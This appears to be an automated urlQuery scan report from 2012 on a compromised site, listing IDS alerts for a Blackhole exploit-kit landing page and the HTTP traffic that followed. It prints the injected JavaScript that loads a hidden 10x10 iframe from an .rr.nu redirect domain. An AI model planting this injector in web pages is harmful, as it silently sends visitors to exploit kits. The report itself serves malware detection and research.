Overview

URL: http://www.maximumadvantage.com/contact_info/index.htm
IP: 198.170.254.65
ASN: AS2914 NTT America, Inc.
Location: United States
Report completed: 2012-11-07 09:55:56 CET
urlQuery Alerts:
- Detected malicious iframe injection
- Detected a TDS URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer:
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-07 09:55:21 | 198.170.254.65 | urlQuery Client | 2 | ET CURRENT_EVENTS Blackhole Try Prototype Catch June 11 2012
2012-11-07 09:55:22 | 67.208.74.71 | urlQuery Client | 3 | ET RBN Known Russian Business Network IP (276)
2012-11-07 09:55:22 | 67.208.74.12 | urlQuery Client | 3 | ET RBN Known Russian Business Network IP (276)
2012-11-07 09:55:22 | urlQuery Client | 67.208.74.71 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 173.194.69.155 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 67.208.74.12 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 67.208.74.12 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 173.194.69.100 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 173.194.69.155 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 67.208.74.12 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:23 | urlQuery Client | 67.208.74.12 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 | urlQuery Client | 173.194.69.155 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 | urlQuery Client | 173.194.69.157 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
2012-11-07 09:55:24 | urlQuery Client | 173.194.69.100 | 2 | ET CURRENT_EVENTS HTTP Request to a *.rr.nu domain
Snort /w Sourcefire VRT
Timestamp | Source IP | Destination IP | Severity | Alert
2012-11-07 09:55:21 | 198.170.254.65 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-07 09:55:21 | 198.170.254.65 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-07 09:55:21 | 198.170.254.65 | urlQuery Client | 1 | EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 4 reports on IP: 198.170.254.65

Date | Alerts / IDS | URL | IP
2012-11-14 18:15:42 | 2 / 15 | http://www.maximumadvantage.com/communication-skills-information/communication-skills (...) | 198.170.254.65
2012-11-14 18:15:39 | 2 / 17 | http://maximumadvantage.com/communication-skills-information/communication-skills | 198.170.254.65
2012-11-13 13:01:08 | 2 / 5 | http://www.maximumadvantage.com/communication-skills-information/communication-skills | 198.170.254.65
2012-10-25 18:45:09 | 2 / 14 | http://www.maximumadvantage.com/communication-skills-information/communication-skills (...) | 198.170.254.65

Last 6 reports on ASN: AS2914 NTT America, Inc.

Date | Alerts / IDS | URL | IP
2013-02-13 07:52:46 | 1 / 5 | http://www.cathair.com/cheri/biograph.htm | 204.202.246.154
2013-02-13 07:03:21 | 0 / 1 | http://aluna.com.au/wordpress/ | 204.42.128.109
2013-02-13 06:07:47 | 0 / 0 | http://a204-2-179-9.deploy.akamaitechnologies.com | 204.2.179.9
2013-02-13 05:43:23 | 3 / 2 | http://hawaiiconference.com/presente.htm | 128.121.134.136
2013-02-13 01:53:04 | 2 / 0 | http://209.238.101.32/ministry-teams/tiny-treasures-2/ | 209.238.101.32
2013-02-13 00:42:57 | 0 / 0 | http://204.202.251.236/cgi-bin/4113-12/SSWEB95.EXE | 204.202.251.236

Last 3 reports on domain: www.maximumadvantage.com

Date | Alerts / IDS | URL | IP
2012-11-14 18:15:42 | 2 / 15 | http://www.maximumadvantage.com/communication-skills-information/communication-skills/ | 198.170.254.65
2012-11-13 13:01:08 | 2 / 5 | http://www.maximumadvantage.com/communication-skills-information/communication-skills | 198.170.254.65
2012-10-25 18:45:09 | 2 / 14 | http://www.maximumadvantage.com/communication-skills-information/communication-skills/ | 198.170.254.65



JavaScript

Executed Scripts (11)


Executed Evals (1)

#1 JavaScript::Eval (size: 569, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://ouyqmiuopsa.rr.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://ouyqmiuopsa.rr.nu/?go=2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

Executed Writes (5)

#1 JavaScript::Write (size: 646, repeated: 1)

<!doctype html><html><body><script>google_ad_channel="";google_ad_client="pub-2844624690808284";google_ad_format="728x90_as";google_ad_height=90;google_ad_type="text_image";google_ad_width=728;google_color_bg="FFFFFF";google_color_border="FFFFFF";google_color_link="0000FF";google_color_text="000000";google_color_url="008000";google_show_ads_impl=true;google_unique_id=1;google_async_iframe_id="aswift_0";google_ad_unit_key="2793510391";google_start_time=1352278523607;google_expand_experiment="none";google_bpp=12;</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20121031/r20120730/show_ads_impl.js"></script></body></html>

#2 JavaScript::Write (size: 906, repeated: 1)

<iframe id="google_ads_frame1" name="google_ads_frame1" width="728" height="90" frameborder="0" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&dt=1352278523607&bpp=12&shv=r20121031&jsv=r20110914&correlator=1352278523946&frm=24&adk=2793510391&ga_vid=19684077.1352278524&ga_sid=1352278524&ga_hid=1594549348&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=3215810476&oid=3&fu=0&ifi=1&dtd=348" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>

#3 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><ins id="aswift_0_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:728px"><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="728" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#4 JavaScript::Write (size: 84, repeated: 1)

<script src='http://www.google-analytics.com/ga.js' type='text/javascript'></script>

#5 JavaScript::Write (size: 105, repeated: 1)

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>


HTTP Transactions (24)


Request Response
GET /contact_info/index.htm HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /Copy%20of%20maximum_advantage_0405/maximum_advantage_comm/style.css HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
GET / HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 08:55:21 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4; path=/
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /?go=2 HTTP/1.1

Host: ouyqmiuopsa.rr.nu

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
HTTP/1.1 301 Moved Permanently

Content-Type: httpd/unix-directory
Date: Wed, 07 Nov 2012 08:55:22 GMT
Server: Apache/1.3.34 (Debian) mod_perl/1.29
Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
Content-Length: 0
Connection: close
GET /redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.maximumadvantage.com/contact_info/index.htm
HTTP/1.1 200 OK

Content-Type: text/html
Date: Wed, 07 Nov 2012 08:55:22 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-None-Match: 15032493890200785914
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Etag: 11458789474174950078
Date: Wed, 07 Nov 2012 08:01:17 GMT
Expires: Wed, 07 Nov 2012 09:01:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5118
X-XSS-Protection: 1; mode=block
Age: 3246
Cache-Control: public, max-age=3600
GET /image_files/badge_riskfree.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 2459
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /include_files/css/sitelutions1.css HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:23 GMT
Accept-Ranges: bytes
Content-Length: 4200
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/sl_logo.png HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 8913
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Etag: 5206557930112377484
Date: Tue, 06 Nov 2012 19:40:17 GMT
Expires: Tue, 20 Nov 2012 19:40:17 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 19221
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 47706
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Wed, 07 Nov 2012 01:09:09 GMT
Expires: Wed, 07 Nov 2012 13:09:09 GMT
Vary: Accept-Encoding
Age: 27974
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /image_files/bg-blurbs-is.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 12143
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /image_files/badge_uptime.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 1628
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/logo_bbbonline.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:22 GMT
Accept-Ranges: bytes
Content-Length: 2994
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/dot.gif HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /image_files/bg-blurbs-bm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 13308
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /image_files/bg-blurbs-cb.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:16 GMT
Accept-Ranges: bytes
Content-Length: 10253
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /pagead/osd.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
If-None-Match: 13350759849962699205
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Etag: 6549576333968007708
Date: Wed, 07 Nov 2012 08:09:12 GMT
Expires: Wed, 07 Nov 2012 09:09:12 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5986
X-XSS-Protection: 1; mode=block
Age: 2772
Cache-Control: public, max-age=3600
GET /pagead/ads?client=ca-pub-2844624690808284&format=728x90_as&output=html&h=90&w=728&ad_type=text_image&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&dt=1352278523607&bpp=12&shv=r20121031&jsv=r20110914&correlator=1352278523946&frm=24&adk=2793510391&ga_vid=19684077.1352278524&ga_sid=1352278524&ga_hid=1594549348&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=11&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=10&ish=10&ifk=3215810476&oid=3&fu=0&ifi=1&dtd=348 HTTP/1.1

Host: googleads.g.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 08:55:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=106603270&utmhn=domainpark.sitelutions.com&utmcs=UTF-8&utmsr=1176x885&utmvp=10x10&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Redirection%20Not%20Found%20ouyqmiuopsa.rr.nu&utmhid=1594549348&utmr=http%3A%2F%2Fwww.maximumadvantage.com%2Fcontact_info%2Findex.htm&utmp=%2Fredir_not_found%2Fredir_not_found.shtml%3Fouyqmiuopsa.rr.nu&utmac=UA-9495639-6&utmcc=__utma%3D90851141.1332034523.1352278524.1352278524.1352278524.1%3B%2B__utmz%3D90851141.1352278524.1.1.utmcsr%3Dmaximumadvantage.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fcontact_info%2Findex.htm%3B&utmu=DB~ HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?ouyqmiuopsa.rr.nu
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Thu, 01 Nov 2012 01:21:37 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 545627
Server: GFE/2.0
GET /image_files/bg-blurbs-dm.jpg HTTP/1.1

Host: domainpark.sitelutions.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://domainpark.sitelutions.com/include_files/css/sitelutions1.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 07 Nov 2012 08:55:23 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:25:17 GMT
Accept-Ranges: bytes
Content-Length: 10926
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.maximumadvantage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=9g2e44eksq4ckc4ohgu5ag31j4
HTTP/1.1 302 Found

Content-Type: text/html; charset=iso-8859-1
Date: Wed, 07 Nov 2012 08:55:24 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Location: http://www.maximumadvantage.com/
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /favicon.ico HTTP/1.1

